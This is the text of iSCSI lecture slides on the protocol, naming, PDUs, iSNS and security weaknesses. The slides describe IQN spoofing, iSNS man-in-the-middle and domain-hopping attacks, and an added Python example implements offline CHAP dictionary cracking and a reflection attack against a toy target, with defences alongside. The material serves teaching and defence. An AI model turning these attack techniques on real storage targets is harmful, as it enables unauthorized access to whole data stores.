ISCSI
A repeat of Ben’s presentation
WHAT IS ISCSI?
• Internet Small Computer System Interface
• A protocol that carries SCSI commands over IP networks
• Developed by IBM and Cisco in 1998
• A lower-cost alternative to Fibre Channel in SANs
STORAGE AREA NETWORKS
• Traditionally, servers would have their own directly attached storage and backup. This only works for small networks in a single location.
• A Storage Area Network introduces centralized storage and backup, which works better in large networks that are geographically dispersed.
• The key to making a SAN work is the network. Because all the servers are dependent on the centralized storage,
FIBRE CHANNEL
• Classic SANs use Fibre Channel to connect the servers to the centralized storage.
• The advantage of Fibre Channel was the increased performance over Ethernet: 2 Gbps vs 100 Mbps at the time of introduction.
• The disadvantage of Fibre Channel is the cost: it requires expensive specialized hardware and cabling.
ETHERNET CAUGHT UP
Year   Ethernet speed   Fibre Channel speed
2001   100 Mbps         2 Gbps
2005   1 Gbps           4 Gbps
2008   10 Gbps          8 Gbps
2011   100 Gbps         16 Gbps
2014   400 Gbps         32 Gbps
ISCSI VS FIBRE CHANNEL
• iSCSI has a lower implementation cost because it can be run over regular TCP/IP networks. Fibre Channel requires expensive specialized hardware.
• Fibre Channel used to be favored for SANs because of the greater performance, but Ethernet is capable of faster speeds now.
• iSCSI runs on the same network as the rest of the business, while Fibre Channel runs on a separate network. This increases the reliability and speed of Fibre
HOW ISCSI WORKS
[Figure: 1 = Initiator, 2 = Encapsulation (SCSI commands carried inside TCP/IP), Target]
ISCSI NAMES
• Both targets and initiators require names for the purpose of identification. Additionally, names allow iSCSI storage to be managed regardless of address.
• iSCSI names must be unique, and because iSCSI can be routed, the name format is designed to be worldwide unique.
• Names are associated with iSCSI nodes.
• iSCSI names are permanent and they are not dependent on address.
ISCSI NAME EXAMPLES
• Layout: iqn.<yyyy-mm>.<naming-authority>[:<string>], or eui.<16 hex digits>
• Type: IQN or EUI
• Date: this date must be a date during which the naming authority owned the domain name used in this format
• Auth: the reversed domain name of the person or organization creating this iSCSI name
• Optional colon-prefixed string, with the character set and length boundaries that the creator deems appropriate.
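The name layout above, as an added example that is not part of the original slides: a small Python validator that splits IQN and EUI names into the parts the slide describes (type, date, naming authority, optional string) and rejects malformed ones. The 223-byte length limit is from RFC 3720; the lowercasing is a simplification of the RFC 3722 normalization, and the sample names are constructed for the example (the first is the example name given in RFC 3720). Note what this code does not and cannot do: a well-formed name says nothing about who sent it, which is the point the security slides later make.

```python
import re

MAX_NAME_LEN = 223  # RFC 3720 3.2.6.2: an iSCSI name is at most 223 bytes

# iqn.<yyyy-mm>.<reversed domain>[:<creator-defined string>]
IQN_RE = re.compile(
    r"^iqn\.(?P<year>\d{4})-(?P<month>\d{2})"
    r"\.(?P<auth>[a-z0-9](?:[a-z0-9-]*[a-z0-9])?(?:\.[a-z0-9](?:[a-z0-9-]*[a-z0-9])?)*)"
    r"(?::(?P<unique>[a-z0-9.:-]+))?$"
)
# eui.<16 hex digits> (an IEEE EUI-64 identifier)
EUI_RE = re.compile(r"^eui\.(?P<eui>[0-9a-f]{16})$")


def parse_iscsi_name(name: str) -> dict:
    """Validate an iSCSI name and split it into its parts.

    Names are lowercased before matching. This is an assumption standing in
    for the RFC 3722 stringprep normalization real initiators apply.
    """
    if len(name.encode("utf-8")) > MAX_NAME_LEN:
        raise ValueError("iSCSI name longer than 223 bytes")
    n = name.lower()
    m = IQN_RE.match(n)
    if m:
        if not 1 <= int(m["month"]) <= 12:
            raise ValueError("IQN date month out of range")
        labels = m["auth"].split(".")
        return {
            "type": "iqn",
            "date": f"{m['year']}-{m['month']}",
            "naming_authority": m["auth"],           # reversed, as written in the name
            "domain": ".".join(reversed(labels)),    # com.example -> example.com
            "unique": m["unique"],                   # None when the colon part is absent
        }
    m = EUI_RE.match(n)
    if m:
        return {"type": "eui", "eui64": m["eui"]}
    raise ValueError(f"not a valid IQN or EUI iSCSI name: {name!r}")


def is_valid_iscsi_name(name: str) -> bool:
    try:
        parse_iscsi_name(name)
        return True
    except ValueError:
        return False


# Constructed sample names for the example
SAMPLE_IQN = "iqn.2001-04.com.example:storage:diskarrays-sn-a8675309"
SAMPLE_EUI = "eui.02004567A425678D"

if __name__ == "__main__":
    print(parse_iscsi_name(SAMPLE_IQN))
    print(parse_iscsi_name(SAMPLE_EUI))
    for bad in ("iqn.2001-13.com.example", "iqn.2001-04.com.example:", "disk1"):
        print(bad, "->", is_valid_iscsi_name(bad))
```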
ISCSI PDU
• iSCSI defines its own packets that are referred to as iSCSI Protocol Data Units (PDUs).
• iSCSI PDUs consist of a header and possibly data, where the data length is specified in the header.
• An iSCSI PDU is sent as the content of one or more TCP packets.
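An added example, not code from the original presentation, of how the header-specified data length is used in practice: a parser for the fixed 48-byte Basic Header Segment (opcode, immediate bit, TotalAHSLength, 24-bit DataSegmentLength, Initiator Task Tag, per RFC 3720 section 10.2.1) and a reassembler that pulls whole PDUs out of a TCP byte stream even when a PDU is split across, or shares, TCP segments. Digests are assumed not to be negotiated, and the login/text PDUs in the sample stream are constructed for the example.

```python
import struct

BHS_LEN = 48  # every iSCSI PDU starts with a 48-byte Basic Header Segment (RFC 3720 10.2.1)

# A few opcodes from RFC 3720, enough for the example
OP_SCSI_COMMAND, OP_LOGIN_REQ, OP_TEXT_REQ = 0x01, 0x03, 0x04


def parse_bhs(bhs: bytes) -> dict:
    """Decode the BHS fields that every PDU shares."""
    if len(bhs) != BHS_LEN:
        raise ValueError("BHS must be exactly 48 bytes")
    return {
        "immediate": bool(bhs[0] & 0x40),            # bit 6 of byte 0: immediate delivery
        "opcode": bhs[0] & 0x3F,                      # low 6 bits of byte 0
        "flags": bhs[1],                              # opcode-specific flags
        "ahs_len": bhs[4] * 4,                        # TotalAHSLength, in 4-byte words
        "data_len": int.from_bytes(bhs[5:8], "big"),  # 24-bit DataSegmentLength
        "itt": struct.unpack(">I", bhs[16:20])[0],    # Initiator Task Tag
    }


def pdu_wire_length(hdr: dict) -> int:
    """Bytes one PDU occupies on the wire (no digests negotiated):
    BHS + AHS + data segment padded to a 4-byte boundary."""
    return BHS_LEN + hdr["ahs_len"] + ((hdr["data_len"] + 3) & ~3)


def build_pdu(opcode: int, data: bytes = b"", itt: int = 0, immediate: bool = False) -> bytes:
    """Serialize a PDU with an empty AHS; the data length is written into the BHS."""
    if len(data) >= 1 << 24:
        raise ValueError("DataSegmentLength is a 24-bit field")
    bhs = bytearray(BHS_LEN)
    bhs[0] = (opcode & 0x3F) | (0x40 if immediate else 0)
    bhs[5:8] = len(data).to_bytes(3, "big")
    bhs[16:20] = struct.pack(">I", itt)
    return bytes(bhs) + data + b"\x00" * ((-len(data)) % 4)


class PduReassembler:
    """Accumulates TCP segment payloads and yields whole PDUs: a PDU may be
    split across several TCP segments, and one segment may hold several PDUs."""

    def __init__(self):
        self.buf = b""

    def feed(self, segment: bytes) -> list:
        self.buf += segment
        out = []
        while len(self.buf) >= BHS_LEN:
            hdr = parse_bhs(self.buf[:BHS_LEN])
            need = pdu_wire_length(hdr)
            if len(self.buf) < need:
                break                                 # wait for the rest of this PDU
            start = BHS_LEN + hdr["ahs_len"]
            out.append((hdr, self.buf[start:start + hdr["data_len"]]))
            self.buf = self.buf[need:]
        return out


def reassemble_stream(stream: bytes, chunk: int) -> list:
    """Deliver `stream` to a reassembler in `chunk`-sized pieces, as TCP might."""
    r = PduReassembler()
    pdus = []
    for i in range(0, len(stream), chunk):
        pdus.extend(r.feed(stream[i:i + chunk]))
    return pdus


# Constructed sample: a Login Request carrying login text keys, followed by a
# Text Request with no data segment, back to back on one TCP byte stream.
LOGIN_TEXT = b"InitiatorName=iqn.2001-04.com.example:host1\x00SessionType=Discovery\x00"
SAMPLE_STREAM = (build_pdu(OP_LOGIN_REQ, LOGIN_TEXT, itt=1, immediate=True)
                 + build_pdu(OP_TEXT_REQ, itt=2))

if __name__ == "__main__":
    for hdr, data in reassemble_stream(SAMPLE_STREAM, chunk=7):
        print(hex(hdr["opcode"]), hdr["immediate"], hdr["data_len"], data)
```

The 7-byte chunking is deliberately awkward so that the header itself arrives in pieces; a real receiver must not act on the data length until it holds all 48 header bytes.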
ISCSI SESSION TYPES
• iSCSI defines two types of sessions:
1. Normal operational sessions
2. Discovery sessions, which are only used for the discovery of iSCSI targets
• The session type is defined during the login phase.
NORMAL OPERATIONAL SESSIONS
• Normal operational sessions have two phases:
1. The login phase
2. The full feature phase
• The login phase provides basic security to the iSCSI protocol. It has to be successfully completed before the session can go into the full feature phase.
• The full feature phase is where data transfer occurs.
• A session can consist of multiple TCP connections.
ISNS (INTERNET STORAGE NAME SERVICE)
• iSNS, the Internet Storage Name Service, is software that runs on an operating system or iSCSI device
• Both initiators and targets register with the iSNS server
• Responsible for:
• Informing iSCSI clients about which targets are available on the network
• Grouping iSCSI clients into their correct domain set
• Informing clients about what security aspects – if any – they must use to associate to targets
ISCSI ERROR DETECTION
• Traditional SCSI operations are assumed to be virtually error-free, because direct-attached SCSI devices share a dedicated parallel bus connection, isolated from network disruptions.
• iSCSI operates over the network, possibly including the Internet. iSCSI needs to be able to deal with disruptions caused by this inherently unreliable network infrastructure.
• Both initiators and targets are able to buffer commands until they are acknowledged. For instance, if the initiator wishes to write to the target it keeps the command data in its buffer
ERROR CORRECTION LEVELS
• Detection and recovery within an iSCSI task, for instance retransmission of a missing or corrupt PDU
• The TCP connection that carries a task may experience errors. Recovery is attempted through a command restart.
• The iSCSI session itself may fail. This means aborting all existing TCP connections for that session, aborting all queued tasks and outstanding commands, and restarting the session through the login phase. This only happens if all other methods of error correction have failed.
ISCSI SECURITY ISSUES
• The compromise of a single iSCSI device equates to the compromise of several (10 to 100) operating systems at once.
• Who cares about admin passwords and root access when the entire data store can be compromised?
TRUSTING INTERNAL PARTIES
• Vendors have this to say about iSCSI security:
• “An iSCSI SAN uses Gigabit Ethernet, a switched network with a point-to-point architecture that makes it nearly impossible to snoop or hijack packets unless you have physical access to the network or switches”
• This implies that all internal parties should be trusted, including employees, vendors, business partners, guests, contractors, etc.
TOP ISCSI SECURITY ISSUES
1. iSCSI names are trusted
2. iSCSI authorization is the only required security mechanism, and it relies on iSCSI names.
3. iSCSI authentication is disabled by default
4. Even when iSCSI authentication is turned on, it relies on CHAP, a fairly weak authentication protocol
5. iSNS servers are not protected
6. iSCSI is a clear-text protocol, unless IPsec encryption is used. This is rarely done.
AUTHORIZATION ATTACK
• iSCSI names go over the network in clear text
• They are easy to sniff, guess, or enumerate
• The attacker spoofs his or her iSCSI name and establishes a connection with an iSCSI target
• Since an iSCSI session often consists of multiple TCP connections, nothing suspicious is detected and the attacker instantly gets access to possibly confidential data
ISNS ISSUES
• A newly registered iSCSI name will be placed in the default domain set.
• Any member of the domain set will be able to enumerate or access the other nodes in the same domain set
• These other nodes can now be used for IQN spoofing attacks.
• Moving iSCSI nodes out of the default domain set and into custom domain sets is an important security mechanism, but
ISNS MAN-IN-THE-MIDDLE
• An attacker can identify the iSNS server by scanning for open port 3205, the iSNS port.
• Using ARP poisoning, a fake iSNS server can be created to replace the real one.
• The attacker can now:
• See all registrations (both targets and clients)
• Modify or change domain sets
• Downgrade domain sets that require security (removing
ISNS DOMAIN HOPPING
• An iSNS server relies on iSCSI names for node identification
• If an attacker simply spoofs his or her iSCSI name to that of the target, the iSNS server will automatically update and overwrite the legitimate node’s information with that of the attacker.
• At minimum: DoS
• At maximum: allows unauthorized hosts to access targets in restricted domains.
ISCSI AUTHENTICATION ATTACK
• Again, authentication is an optional implementation. When enabled, it uses CHAP.
• Vulnerable to a brute-force attack: the CHAP ID, challenge and response all cross the wire in clear text, so a captured login can be attacked offline
• Tools are available that automate this process
ISCSI MESSAGE REFLECTION ATTACK
• Attacker requests authentication to an iSCSI target
• Receives CHAP ID and Challenge
• Attacker opens a separate connection to the target and forces it to authenticate, presenting the target’s own CHAP ID and Challenge back to it
• The RFC states that any iSCSI target must respond to authentication requests by default
• Attacker receives the correct authentication hash from the target, and can use it in the first connection to authenticate
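The two attacks on CHAP above (the offline brute force and the reflection), as one added example that is not code from the original presentation. It implements the CHAP-MD5 response iSCSI login uses, response = MD5(ID || secret || challenge) from RFC 1994, runs a dictionary attack over a constructed sniffed exchange, and simulates the reflection against a toy target. The target class, its connection bookkeeping and the sample secrets and wordlist are assumptions made for the example; the one RFC requirement it models is that a responder must refuse a challenge it issued itself (RFC 3720 section 8.2.1). The reflection succeeds only when the same secret is configured in both directions, which is why the two defences shown are a distinct mutual secret and the challenge-reuse check.

```python
import hashlib
import os
from typing import Optional, Tuple


def chap_response(chap_id: int, secret: bytes, challenge: bytes) -> bytes:
    """CHAP-MD5 (RFC 1994), the algorithm iSCSI login uses:
    response = MD5(identifier || secret || challenge)."""
    return hashlib.md5(bytes([chap_id & 0xFF]) + secret + challenge).digest()


# --- 1. Offline dictionary attack on a sniffed login -------------------------
def crack_chap(chap_id: int, challenge: bytes, response: bytes, wordlist) -> Optional[bytes]:
    """CHAP_I, CHAP_C and CHAP_R travel in clear text in the login PDUs, so an
    attacker who captured them can test candidate secrets offline at MD5 speed."""
    for cand in wordlist:
        if chap_response(chap_id, cand, challenge) == response:
            return cand
    return None


# Constructed sniffed exchange (not real captured traffic): the initiator's
# secret is a weak dictionary word.
SNIFFED_ID = 0x2A
SNIFFED_CHALLENGE = bytes.fromhex("0b1e6a9c5d4e3f2a1b0c9d8e7f6a5b4c")
SNIFFED_RESPONSE = chap_response(SNIFFED_ID, b"password1", SNIFFED_CHALLENGE)
WORDLIST = [b"letmein", b"iscsi", b"password", b"password1", b"admin123"]


# --- 2. Reflection attack against a target running mutual CHAP ---------------
class Target:
    """Toy target (assumption for the example). `secret` authenticates initiators;
    under mutual CHAP the target proves itself with `mutual_secret`, which
    defaults to the same secret: the misconfiguration the reflection needs."""

    def __init__(self, secret: bytes, mutual_secret: Optional[bytes] = None,
                 reject_reused_challenge: bool = False):
        self.secret = secret
        self.mutual_secret = mutual_secret if mutual_secret is not None else secret
        self.reject_reused = reject_reused_challenge
        self.issued = {}   # connection id -> (CHAP_I, CHAP_C) this target sent

    def start_login(self, conn: str) -> Tuple[int, bytes]:
        chap_id, chal = os.urandom(1)[0], os.urandom(16)
        self.issued[conn] = (chap_id, chal)
        return chap_id, chal   # CHAP_I and CHAP_C go to the initiator in clear text

    def verify_initiator(self, conn: str, response: bytes) -> bool:
        chap_id, chal = self.issued[conn]
        return response == chap_response(chap_id, self.secret, chal)

    def answer_initiator_challenge(self, chap_id: int, challenge: bytes) -> bytes:
        """Mutual CHAP: the initiator challenges the target and the target answers."""
        if self.reject_reused and any(c == challenge for _, c in self.issued.values()):
            # RFC 3720 8.2.1: a responder must refuse a challenge it issued itself
            raise PermissionError("initiator reused the target's own challenge")
        return chap_response(chap_id, self.mutual_secret, challenge)


def reflection_attack(target: Target) -> bool:
    """Attacker knows no secret. Connection 1: collect the target's CHAP_I/CHAP_C.
    Connection 2: hand that same ID and challenge back to the target as the
    attacker's own mutual-CHAP challenge, then replay the target's answer on
    connection 1. Returns True if the target accepts the replayed answer."""
    chap_id, chal = target.start_login("conn1")
    target.start_login("conn2")
    try:
        answer = target.answer_initiator_challenge(chap_id, chal)
    except PermissionError:
        return False
    return target.verify_initiator("conn1", answer)


if __name__ == "__main__":
    print("cracked secret:", crack_chap(SNIFFED_ID, SNIFFED_CHALLENGE, SNIFFED_RESPONSE, WORDLIST))
    print("same secret both ways:", reflection_attack(Target(b"s3cret")))
    print("distinct mutual secret:", reflection_attack(Target(b"s3cret", b"other-secret")))
    print("challenge-reuse check:", reflection_attack(Target(b"s3cret", reject_reused_challenge=True)))
```

Neither defence helps against the dictionary attack in part 1: that needs a long random secret, or IPsec so the exchange is never captured in the clear.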
ISCSI SECURITY RECOMMENDATIONS
1. Ensure proper configuration of the iSCSI devices and network
2. Enable mutual authentication, and don’t rely only on CHAP
3. Create multiple discovery domains; only use the default domain set for random registrations
4. Require iSNS IPsec
5. Enable iSCSI IPsec.